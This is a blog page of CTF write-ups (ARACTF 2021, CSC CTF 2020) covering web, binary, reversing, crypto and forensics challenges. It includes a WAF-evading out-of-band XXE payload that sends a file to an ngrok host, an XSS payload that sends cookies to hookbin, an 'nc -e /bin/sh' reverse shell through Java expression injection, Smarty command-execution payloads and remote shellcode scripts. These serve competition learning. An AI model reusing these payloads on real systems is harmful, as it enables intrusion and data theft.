DEV Community: yudi

Web Exploitation - Final ARACTF 2021 Write Up

yudi — Mon, 22 Mar 2021 16:20:48 +0000

Under Development

Website ini sesuai judulnya jadi belum layak untuk dionlinekan ( ͡◉ ͜ʖ ͡◉)

Hint: Do you know about encoding format? How many? If you do let's wrap this challenge

Technical Report

When opening the website suddenly the page is redirected to login.php which is a fake form

so in this case, I use burpsuite to see what's the content of the index.php

There's an interesting javascript function called sendmessage that sends xml to /send.php. The payload should look like this

<?xml version="1.0"?>
<root>
    <name>yudi</name>
    <email>test@test.com</email>
    <message>hello world!</message>
</root>

I also found another interesting link to mybest.php

In that page (mybest.php), I found another hint says /flag.txt

So I guess the xml thing that we see earlier can be used to retrieve file /flag.txt. let's try it using insomnia with this payload

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]>
<root>&test;</root>

result:

But, there's another issue:

I got no output (it's blind)
WAF reject !DOCTYPE !ENTITY !ELEMENT file:// and .php

Then I try the out-of-band (OOB) attack method to load a remote resource.
The payload:

<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY % flag SYSTEM "http://075a05cf94ed.ngrok.io/dtd.xml">
%flag;
%all;
]>
<root>&send;</root>

dtd.xml

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/%file;'>">

then I encoded all the payload to UTF-7 to bypass the WAF.
The final payload:

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4

dtd.xml

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-ENTITY +ACU file SYSTEM +ACI-php://filter/convert.base64-encode/resource=/flag.txt+ACIAPg
+ADwAIQ-ENTITY +ACU all +ACIAPAAh-ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/+ACU-file+ADs'+AD4AIgA+

result:

FLAG: ara2021{ezzz_pz_lemon_sqzzzz}

Final CSC CTF 2020 Write Up

yudi — Wed, 30 Dec 2020 05:26:54 +0000

Team Member
ChaO
AnehMan
MBEERRR

Daftar Isi

Binary Exploitation
- Babysc
Reverse Engineering
- Readme
- Breaker
- Cr4shed
Web Exploitation
- Plot
- Authey

Binary Exploitation

Babysc

Diberikan sebuah binary dengan spesifikasi sebagai berikut.

Terlihat bahwa binary menggunakan arsitektur 64 bit dan security yang ada pada binary tersebut ter-enabled semua. Namun jika dilihat lebih baik di IDA Pro, binary tersebut akan meng-exec shellcode yang akan menjadi inputan kita. Berikut merupakan potongan pseudocode nya.

Namun, syscall difilter sedemikian rupa sehingga kita hanya bisa memakai beberapa syscall. Untuk melihat syscall yang bisa / tidak bisa kita pakai, kami menggunakan seccomp-tools. Berikut gambarnya.

Dapat dilihat binary hanya bisa melakukan openat, read, write, getdents64, exit, dan exit_group.

Ide kami adalah untuk melihat unknown_dir terlebih dahulu dengan getdents64 agar kita dapat melihat lokasi dari flag.

Berikut exploit yang kami buat.

from pwn import *

context.arch = 'amd64'

# p = process("./babysc")

p = remote("139.59.97.212", 23339)

shellcode = ''

#/home/babysc/55ffa688e1003d7020b4b2b0e84b85fc/flag.txt

shellcode += asm(shellcraft.openat(0, '/home/babysc/', 0, 0))

shellcode += asm(shellcraft.getdents64('rax', 'rsp', 0x100))

shellcode += asm(shellcraft.write(1, 'rsp', 0x100))

p.sendline(shellcode)

p.interactive()

Pertama, kami lakukan list directory pada /home/babysc untuk melihat nama directory yg unknown tersebut. Berikut outputnya.

Sekarang sudah terlihat bahwa nama directory yang tidak diketahui tersebut adalah 55ffa688e1003d7020b4b2b0e84b85fc. Jika kita lihat lagi isi dari directory tersebut, akan terdapat file flag.txt. Selanjutnya tinggal kita baca saja isi dari flag tersebut dengan openat, read, write. Berikut exploit yang kami buat.

from pwn import *

context.arch = 'amd64'

# p = process("./babysc")

p = remote("139.59.97.212", 23339)

shellcode = ''

#/home/babysc/55ffa688e1003d7020b4b2b0e84b85fc/flag.txt

shellcode += asm(shellcraft.openat(0, '/home/babysc/55ffa688e1003d7020b4b2b0e84b85fc/flag.txt', 0, 0))

shellcode += asm(shellcraft.read('rax', 'rsp', 0x100))

shellcode += asm(shellcraft.write(1, 'rsp', 0x100))

p.sendline(shellcode)

p.interactive()

CSCCTF{on3_b4bySteP_At_a_t1mE}

Reverse Engineering

Readme

Diberikan file asm dengan nama main.s, berikut penampakannya

.section    __TEXT,__text,regular,pure_instructions

.ios_version_min 11, 0    sdk_version 14, 2

.globl    _notmain                ; -- Begin function notmain

.p2align    2

_notmain:                               ; @notmain

   sub    sp, sp, #64             ; =64

   stp    x29, x30, [sp, #48]     ; 16-byte Folded Spill

   add    x29, sp, #48            ; =48

   stur    w0, [x29, #-4]

   stur    x1, [x29, #-16]

   mov    x8, #100

   str    x8, [sp, #24]

   str    wzr, [sp, #20]

LBB0_1:

   ldr    w8, [sp, #20]

   cmp    w8, #1337

   b.ge    LBB0_28

   ldr    w8, [sp, #20]

   mov    w9, #3

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_4

   ldr    x8, [sp, #24]

   add    x8, x8, #1000

   str    x8, [sp, #24]

   b    LBB0_26

LBB0_4:

   ldr    w8, [sp, #20]

   mov    w9, #4

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_6

   ldr    x8, [sp, #24]

   add    x8, x8, #100

   str    x8, [sp, #24]

   b    LBB0_25

LBB0_6:

   ldr    w8, [sp, #20]

   mov    w9, #5

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_8

   ldr    x8, [sp, #24]

   add    x8, x8, #10

   str    x8, [sp, #24]

   b    LBB0_24

LBB0_8:

   ldr    w8, [sp, #20]

   mov    w9, #6

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_10

   ldr    x8, [sp, #24]

   add    x8, x8, #1

   str    x8, [sp, #24]

   b    LBB0_23

LBB0_10:

   ldr    w8, [sp, #20]

   mov    w9, #7

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_12

   ldr    x8, [sp, #24]

   add    x8, x8, #2000

   str    x8, [sp, #24]

   b    LBB0_22

LBB0_12:

   ldr    w8, [sp, #20]

   mov    w9, #8

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_14

   ldr    x8, [sp, #24]

   add    x8, x8, #200

   str    x8, [sp, #24]

   b    LBB0_21

LBB0_14:

   ldr    w8, [sp, #20]

   mov    w9, #9

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_16

   ldr    x8, [sp, #24]

   add    x8, x8, #20

   str    x8, [sp, #24]

   b    LBB0_20

LBB0_16:

   ldr    w8, [sp, #20]

   mov    w9, #10

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_18

   ldr    x8, [sp, #24]

   add    x8, x8, #2

   str    x8, [sp, #24]

   b    LBB0_19

LBB0_18:

   ldr    x8, [sp, #24]

   add    x8, x8, #1337

   str    x8, [sp, #24]

LBB0_19:

LBB0_20:

LBB0_21:

LBB0_22:

LBB0_23:

LBB0_24:

LBB0_25:

LBB0_26:

   ldr    w8, [sp, #20]

   add    w8, w8, #1

   str    w8, [sp, #20]

   b    LBB0_1

LBB0_28:

       ldr    x8, [sp, #24]

       adrp    x0, l_.str@PAGE

       add    x0, x0, l_.str@PAGEOFF

       mov    x9, sp

       str    x8, [x9]

       bl    _printf

       mov    w10, #0

       mov    x0, x10

       ldp    x29, x30, [sp, #48]

       add    sp, sp, #64

       ret

   .section    __TEXT,__cstring,cstring_literals

l_.str:                                 ## @.str

   .asciz    "%lld”

Program akan melakukan operasi aritmatika, dan hasilnya akan di print. Flag adalah output dari program tersebut.

Karena ini ARM, dan kami tidak pernah membaca assembly dari ARM, kami melakukan sedikit googling. Setelah melakukan googling dan analisa pada assembly yang diberikan, kami bisa menyimpulkan bahwa:
1. Program dimulai dari _notmain
2. Setelah perintah di _notmain selesai, selanjutnya program akan menjalankan perintah di LBB0_1
3. LBB0_1 merupakan looping, dimana kondisinya adalah w8 < 1337, dan pada fungsi LBB0_26, w8 akan ditambah 1 (increment)
4. Ada banyak sekali if statement (if dalam if, atau nested if), dengan statement yang serupa
5. Setelah melalui operasi aritmatika yang berada di dalam loop + nested if tadi, program akan menyimpan hasilnya di variabel x8, di print, dan program berakhir

w8 = 0

x8 = 100

sp24 = x8

sp20 = 0

while w8 < 1337:

   w8 = sp20

   w9 = 3

   w10 = w8//w9

   w9 = w10*w9

   w8 = w8 - w9

   # print(w8)

   if w8 != 0:

       # LBB0_4

       w8 = sp20

       w9 = 4

       w10 = w8//w9

       w9 = w10*w9

       w8 = w8 - w9

       if w8 != 0:

           # LBB0_6

           w8 = sp20

           w9 = 5

           w10 = w8//w9

           w9 = w10*w9

           w8 = w8 - w9

           if w8 != 0:

               # LBB0_8

               w8 = sp20

               w9 = 6

               w10 = w8//w9

               w9 = w10*w9

               w8 = w8 - w9

               if w8 != 0:

                   # LBB0_10

                   w8 = sp20

                   w9 = 7

                   w10 = w8//w9

                   w9 = w10*w9

                   w8 = w8 - w9

                   if w8 != 0:

                       # LBB0_12

                       w8 = sp20

                       w9 = 8

                       w10 = w8//w9

                       w9 = w10*w9

                       w8 = w8 - w9

                       if w8 != 0:

                           # LBB0_14

                           w8 = sp20

                           w9 = 9

                           w10 = w8//w9

                           w9 = w10*w9

                           w8 = w8 - w9

                           if w8 != 0:

                               # LBB0_16

                               w8 = sp20

                               w9 = 10

                               w10 = w8//w9

                               w9 = w10*w9

                               w8 = w8 - w9

                               if w8 != 0:

                                   # LBB0_18

                                   x8 = sp24

                                   x8 = x8 + 1337

                                   sp24 = x8

                               x8 = sp24

                               x8 = x8 + 2

                               sp24 = x8

                           x8 = sp24

                           x8 = x8 + 20

                           sp24 = x8

                       x8 = sp24

                       x8 = x8 + 200

                       sp24 = x8

                   x8 = sp24

                   x8 = x8 + 2000

                   sp24 = x8

               x8 = sp24

               x8 = x8 + 1

               sp24 = x8

           x8 = sp24

           x8 = x8 + 10

           sp24 = x8

       x8 = sp24

       x8 = x8 + 100

       sp24 = x8

   sp24 = x8

   x8 = x8 + 1000

   sp24 = x8

   # LBB0_26

   w8 = sp20

   w8 = w8 + 1

   sp20 = w8

# LBB0_28

x8 = sp24

print(x8)

Hasilnya adalah:

Coba submit, eh salah :((

Setelah bingung selama kurang lebih 1 jam (dan coba nebak flag), kami menyadari 1 hal. Pada saat perintah cbnz, kita mencoba menambahkan else setelah melakukan pengecekan kalau w8 bernilai 0 atau tidak (Compare and Branch on Non-Zero). Jadi kita menambahkan tambahan else pada setiap if yang ada. Berikut adalah script python nya

# not_main

w8 = 0

x8 = 100

sp24 = x8

sp20 = 0

# LBB0_1

while w8 < 1337:

   w8 = sp20

   w9 = 3

   w10 = w8//w9

   w9 = w10*w9

   w8 = w8 - w9

   if w8 != 0:

       # LBB0_4

       w8 = sp20

       w9 = 4

       w10 = w8//w9

       w9 = w10*w9

       w8 = w8 - w9

       if w8 != 0:

           # LBB0_6

           w8 = sp20

           w9 = 5

           w10 = w8//w9

           w9 = w10*w9

           w8 = w8 - w9

           if w8 != 0:

               # LBB0_8

               w8 = sp20

               w9 = 6

               w10 = w8//w9

               w9 = w10*w9

               w8 = w8 - w9

               if w8 != 0:

                   # LBB0_10

                   w8 = sp20

                   w9 = 7

                   w10 = w8//w9

                   w9 = w10*w9

                   w8 = w8 - w9

                   if w8 != 0:

                       # LBB0_12

                       w8 = sp20

                       w9 = 8

                       w10 = w8//w9

                       w9 = w10*w9

                       w8 = w8 - w9

                       if w8 != 0:

                           # LBB0_14

                           w8 = sp20

                           w9 = 9

                           w10 = w8//w9

                           w9 = w10*w9

                           w8 = w8 - w9

                           if w8 != 0:

                               # LBB0_16

                               w8 = sp20

                               w9 = 10

                               w10 = w8//w9

                               w9 = w10*w9

                               w8 = w8 - w9

                               if w8 != 0:

                                   # LBB0_18

                                   x8 = sp24

                                   x8 = x8 + 1337

                                   sp24 = x8

                               else:

                                   x8 = sp24

                                   x8 = x8 + 2

                                   sp24 = x8

                           else:

                               x8 = sp24

                               x8 = x8 + 20

                               sp24 = x8

                       else:

                           x8 = sp24

                           x8 = x8 + 200

                           sp24 = x8

                   else:

                       x8 = sp24

                       x8 = x8 + 2000

                       sp24 = x8

               else:

                   x8 = sp24

                   x8 = x8 + 1

                   sp24 = x8

           else:

               x8 = sp24

               x8 = x8 + 10

               sp24 = x8

       else:

           x8 = sp24

           x8 = x8 + 100

           sp24 = x8

   else:

       sp24 = x8

       x8 = x8 + 1000

       sp24 = x8

   # LBB0_26

   w8 = sp20

   w8 = w8 + 1

   sp20 = w8

# LBB0_28

x8 = sp24

print("CSCCTF{"+str(x8)+"}")

Hasilnya:

Kita coba submit, akhirnya bener juga :’)
Flag: CSCCTF{1233423}

Breaker

Diberikan sebuah binary, saat dirun kami langsung berpikir untuk bruteforce tanpa melihat pseudocodenya h3h3.

Langsung saja kami buat script bruteforcenya, kami melakukan bruteforce per karakter untuk mendapatkan karakter yang tepat pada tiap guess yang ada.

Berikut skrip yang kami buat.

from pwn import *

import string

flag = ''

for i in range(1, 49):

 for j in string.printable:

   try:

     context.log_level = 'error'

     p = process("./breaker")

     if flag != '':

       for x in flag:

         p.sendline(x)

     p.sendline(j)

     p.recvline()

     level = p.recv(timeout=0.2)

     # print level

     if "1/48" not in level:

       flag += j

       p.close()

       print "Flag: ", flag

       break

     p.close()

   except:

     pass

p = process("./breaker")

for x in flag:

 p.sendline(x)

p.sendline('w')

# p.interactive()

print p.recv()

Maunya pake subprocess, tapi ga bisa jadinya pake pwntools hikz :(

Flag: CSCCTF{wh4t_th3_fun_m0m3nt_brutef0rc1ng_w1th_SubPr0cesS}

Cr4shed

Diberikan file .ipa, jika dicek dengan perintah file, ternyata merupakan Zip archive data

Langsung saja kita unzip, berikut adalah beberapa file yang berhasil di extract.

Berdasarkan pengalaman waktu kualifikasi, kami langsung mencari string “CSCCTF” di semua tempat. Ya, kami menemukan flagnya. Pengalaman memang guru terbaik h3h3h3

Flag: CSCCTF{G00dR3v3rs3rC4nM4k34L0T0fM0n3Y}

Web Exploitation

Diberikan web dengan tampilan sebagai berikut

Langsung saja mendaftar dengan

Email: a@a.com

Password: password

Login, lalu tinggal klik “Get Some CSCCTF Thingy Tiny Pointy Flaggy”, flag muncul

Flag: CSCCTF{2020_Pollution_4nd_Corrupt1on}

Authey

Adanya vuln xss pada saat compose message content yang dikirimkan akan dieksekusi pada browser si admin@getflaghere.com. Vuln tersebut dapat dimanfaatkan untuk mencuri cookie admin.

Pada input content kami menggunakan payload sebagai berikut:

window.location.href=”https://hookb.in/BY7VJGN69jFLDDx31Pjo?c=” + document.cookie

Pada hookbin kami berhasil mendapatkan cookie milik admin

Kami mengganti cookie kami menggunakan cookie milik admin:

Flag: CSCCTF{great_cost_for_00pen_redirection}

CSC CTF 2020 Write Up

yudi — Mon, 07 Dec 2020 14:22:15 +0000

Tim Member
ChaO
AnehMan
MBEERRR

Daftar Isi

Cryptography
- Here We Go Again
Forensic
- Aing, Robot
Reverse Engineering
- Welcome to CSCCTF
- Higher Please
Web Exploitation
- Speliberg
- not-so-smart
- iHateDevelopers

Cryptography

Here We Go Again

Executive Summary

Another good old menu in our cryptography section
Author: EternalBeats

Technical Report

Diberikan file encrypted.txt. Berikut penampakannya

Ada 1 modulus, 1 eksponen, dan 36 ciphertext. Kami menduga bahwa tiap karakter flag di encrypt. Jadi kami melakukan brute force, jika karakter yang di encrypt sama dengan ciphertext index ke-i, maka kita menemukan karakter flag. Berikut adalah full scriptnya

from Crypto.Util.number import *

var = open("encrypted.txt","r").read().strip()
exec(var)   #n,e,cipher[]

flag = ""

for c in cipher:
   for m in range(256):
       res = pow(m,e,n)
       if res == c:
           flag += chr(m)
           break

print("FLAG:",flag)

Hasil

Flag

Flag: CSCCTF{Rs4_d3crYpt10n_By_3ncRypT10n}

Forensic

Aing, Robot

Executive Summary

Sketch like Sonny https://www.youtube.com/watch?v=Bs60aWyLrnI

Author: Bigby

File: robot.mp4

Technical Report

Diberikam sebuah video dengan background putih dan kami melihat di beberapa frame pada video terdapat garis - garis hitam dengan pola yang menarik. Hal pertama yang kami pikirkan adalah mencoba menggabungkan semua frame pada video tersebut dan menghapus background putih. Berikut scriptnya:

Setelah dijalankan kami mendapatkan hasil seperti ini

Semua file tersebut adalah frame dari video yang sudah diedit backgroundnya menjadi transparan. Kami kemudian menggabungkan semua frame tersebut menggunakan gimp. Berikut penampakannya:

FLAG

CSCCTF{M4NT4P_53K4R4N9_B3rS1hK4n_F1L3}

Reverse Engineering

Welcome to CSCCTF

Executive Summary

Welcome to CSCCTF! Begin your reverse engineering journey from this problem. Can you find the key?
Author: darmads

Technical Report

Diberikan sebuah file apk. Langsung saja decompile online, dan baca sourcenya. Kode yang terpenting terdapat pada line code berikut ini.

public final boolean check(String kunci) {

       String str = kunci;

       Intrinsics.checkParameterIsNotNull(str, "kunci");

       if (kunci.length() >= 25 &&

           str.charAt(20) - str.charAt(0) == 24 &&

           str.charAt(8) + str.charAt(5) == 126 &&

           str.charAt(14) * str.charAt(5) == 3696 &&

            str.charAt(21) - str.charAt(1) == 33 &&

            str.charAt(10) - str.charAt(0) == 2 &&

            str.charAt(17) - str.charAt(0) == 19 &&

            str.charAt(17) * str.charAt(1) == 3848 &&

            str.charAt(4) + str.charAt(6) == 123 &&

            str.charAt(13) * str.charAt(16) == 4488 &&

            str.charAt(1) * str.charAt(6) == 2600 &&

            str.charAt(13) * str.charAt(23) == 3536 &&

            str.charAt(8) - str.charAt(5) == 14 &&

            str.charAt(15) + str.charAt(5) == 123 &&

            str.charAt(20) - str.charAt(17) == 5 &&

            str.charAt(17) + str.charAt(16) == 140 &&

            str.charAt(16) + str.charAt(14) == 132 &&

            str.charAt(3) * str.charAt(6) == 4250 &&

            str.charAt(18) + str.charAt(14) == 145 &&

            str.charAt(13) * 2 == 136 &&

            str.charAt(17) - str.charAt(10) == 17 &&

            str.charAt(11) + str.charAt(8) == 145 &&

            str.charAt(9) + str.charAt(1) == 135 &&

            str.charAt(11) + str.charAt(24) == 146 &&

            str.charAt(3) - str.charAt(7) == 11 &&

            str.charAt(0) - str.charAt(2) == 2 &&

            str.charAt(11) - str.charAt(13) == 7 &&

            str.charAt(3) + str.charAt(4) == 158 &&

            str.charAt(3) - str.charAt(16) == 19 &&

            str.charAt(4) - str.charAt(14) == 7 &&

            str.charAt(12) * str.charAt(1) == 4056 &&

            str.charAt(20) + str.charAt(8) == 149 &&

            str.charAt(9) - str.charAt(4) == 10 &&

            str.charAt(9) - str.charAt(6) == 33 &&

            str.charAt(9) * str.charAt(13) == 5644 &&

            str.charAt(16) + str.charAt(5) == 122 &&

            str.charAt(16) - str.charAt(10) == 9 &&

            str.charAt(17) + str.charAt(24) == 145 &&

            str.charAt(20) - str.charAt(13) == 11 &&

            str.charAt(18) * str.charAt(11) == 5925 &&

            str.charAt(21) * str.charAt(23) == 4420 &&

            str.charAt(22) * str.charAt(7) == 5698 &&

            str.charAt(15) - str.charAt(19) == 12 &&

            str.charAt(16) - str.charAt(1) == 14 &&

            str.charAt(3) - str.charAt(13) == 17 &&

            str.charAt(12) * str.charAt(8) == 5460 &&

            str.charAt(21) * str.charAt(13) == 5780 &&

            str.charAt(7) * str.charAt(1) == 3848 &&

            str.charAt(22) + str.charAt(6) == 127 &&

            str.charAt(13) + str.charAt(5) == 124 &&

            str.charAt(24) + str.charAt(1) == 123) {

           return true;

       }

       return false;

   }

Sepertinya, apk tersebut meminta sebuah serial key untuk dimasukkan, jika true maka akan menghasilkan flag. Dan pengecekan serial key akan dilakukan pada line code diatas. Untuk men-generate serial key, kami menggunakan z3solver. Berikut kode yang kami buat untuk mendapatkan serial key tersebut.

from z3 import *

vars = [Int(str(i)) for i in range(25)]

s = Solver()

s.add(vars[20] - vars[0] == 24)

s.add(vars[8]+ vars[5] == 126 )

s.add(vars[14] * vars[5] == 3696)

s.add(vars[21] - vars[1] == 33)

s.add(vars[10] - vars[0] == 2)

s.add(vars[17] - vars[0] == 19)

s.add(vars[17] * vars[1] == 3848)

s.add(vars[4]+ vars[6] == 123 )

s.add(vars[13] * vars[16] == 4488)

s.add(vars[1]* vars[6] == 2600 )

s.add(vars[13] * vars[23] == 3536)

s.add(vars[8]- vars[5] == 14 )

s.add(vars[15] + vars[5] == 123)

s.add(vars[20] - vars[17] == 5)

s.add(vars[17] + vars[16] == 140)

s.add(vars[16] + vars[14] == 132)

s.add(vars[3]* vars[6] == 4250 )

s.add(vars[18] + vars[14] == 145)

s.add(vars[13] * 2 == 136)

s.add(vars[17] - vars[10] == 17)

s.add(vars[11] + vars[8] == 145)

s.add(vars[9]+ vars[1] == 135 )

s.add(vars[11] + vars[24] == 146)

s.add(vars[3]- vars[7] == 11 )

s.add(vars[0]- vars[2] == 2 )

s.add(vars[11] - vars[13] == 7)

s.add(vars[3]+ vars[4] == 158 )

s.add(vars[3]- vars[16] == 19 )

s.add(vars[4]- vars[14] == 7 )

s.add(vars[12] * vars[1] == 4056)

s.add(vars[20] + vars[8] == 149)

s.add(vars[9]- vars[4] == 10 )

s.add(vars[9]- vars[6] == 33 )

s.add(vars[9]* vars[13] == 5644 )

s.add(vars[16] + vars[5] == 122)

s.add(vars[16] - vars[10] == 9)

s.add(vars[17] + vars[24] == 145)

s.add(vars[20] - vars[13] == 11)

s.add(vars[18] * vars[11] == 5925)

s.add(vars[21] * vars[23] == 4420)

s.add(vars[22] * vars[7] == 5698)

s.add(vars[15] - vars[19] == 12)

s.add(vars[16] - vars[1] == 14)

s.add(vars[3]- vars[13] == 17 )

s.add(vars[12] * vars[8] == 5460)

s.add(vars[21] * vars[13] == 5780)

s.add(vars[7]* vars[1] == 3848 )

s.add(vars[22] + vars[6] == 127)

s.add(vars[13] + vars[5] == 124)

s.add(vars[24] + vars[1] == 123)

print s.check()

print s.model()

w = {5 : 56,

21 : 85,

3 : 85,

19 : 55,

22 : 77,

23 : 52,

18 : 79,

20 : 79,

16 : 66,

9 : 83,

6 : 50,

4 : 73,

8 : 70,

12 : 78,

14 : 66,

11 : 75,

2 : 53,

7 : 74,

24 : 71,

13 : 68,

17 : 74,

15 : 67,

10 : 57,

1 : 52,

0 : 55}

test = []

for i in w:

 test.append(i)

serial = ''

for i in range(len(w)):

 serial += chr(w[test[i]])

print serial

Jalankan scriptnya.

Akan didapatkan serial key seperti itu, langsung saja masukkan ke apknya.

Ternyata flagnya adalah serial key tersebut, hanya saja ditambahkan karakter “-” tiap 5 karakter.

Flag

CSCCTF{745UI-82JFS-9KNDB-CBJO7-OUM4G}

Higher Please

Executive Summary

Objective: Grab the flag!
Author: darmads
https://drive.google.com/file/d/1PpoawEkFW0tIh_UmTlKVcERdQZ2YTc_o/view?usp=sharing

Technical Report

Diberikan sebuah game dengan unity. Namun, karena kategori challenge ini adalah REVERSE, kami memutuskan untuk melakukan decompile terhadap file AssemblyC-Sharp.dll untuk melakukan reversing terhadap game tersebut. Pada hint juga disebutkan untuk menabrakkan diri ke tulisan FLAG untuk mendapatkan flag. Kami menggunakan dnSpy untuk mendecompile file tersebut dan mengcompilenya kembali dengan kode yang baru sehingga karakter kami bisa terbang dan menabrakkan diri terus menerus kepada flag, sayangnya flag tak kunjung muncul. Akhirnya kami putus asa dan salah satu dari team kami memiliki ide konyol untuk melakukan strings pada setiap file dan mencari string CSCCTF{ untuk mendapatkan flagnya.

Ternyata gamenya gak perlu di reverse >:(.
Reversenya kox jadi forensic >:(.

Flag

CSCCTF{1_H0pe_I_w4s_b0rn_T4ll3r}

Web Exploitation

Speliberg

Executive Summary

Author: Siahaan

http://128.199.77.174:20203

Technical Report

Diberikan sebuah web & source code nya yang di buat menggunakan bahasa pemrograman java. Berikut isi filenya

Dari file yang diberikan kami melihat adanya vuln rce yang terletak pada file MovieController.java di variable expr yang bisa di esacape.

Disini kami mencoba melakukan reverse shell pada input title dengan cara mengescape petik sebagai berikut:

' + T(java.lang.Runtime).getRuntime().exec("nc -e /bin/sh your-ip-here") + '

Pada tab home kami ketikkan lagi payload tadi agar tereksekusi

Flag ada di dir /. Tinggal di cat

Flag

CSCCTF{sst1_4lways_haz_freinds}

not-so-smart

Executive Summary

I only wanna marry someone who's smarter than me - xomeone

Author: ArkAngels

Flag ada di /

http://128.199.77.174:20200

Technical Report

Diberikan sebuah web dengan vuln SSTI, awalnya saya sangat terfokus pada payload SSTI pada Twig karena terlalu sering SSTI pake twig.

Ternyata judul soal adalah hint dari challenge ini, akhirnya kami mencoba untuk memakai payload smarty. Berikut payload yang kami gunakan.

{php}echo `ls /`;{/php}

Akhirnya berhasil ls. Selanjutnya tinggal cat flag tersebut dengan payload

{php}echo `cat /f*`;{/php}

FLAG

CSCCTF{you_are_smarter_than_MEH!}

iHateDevelopers

Executive Summary

Author: Siahaan
http://128.199.77.174:20201

Technical Report

Diberikan URL yang berisi permainan PacMan. Berikut penampakannya

Ketika kita akan melihat source, kita disambut dengan alert.

Langsung saja kita mematikan JavaScript di browser, refresh page, view source. Ternyata flag ada langsung di source

FLAG

CSCCTF{for_those_wh0_rely_on_JS_4lone}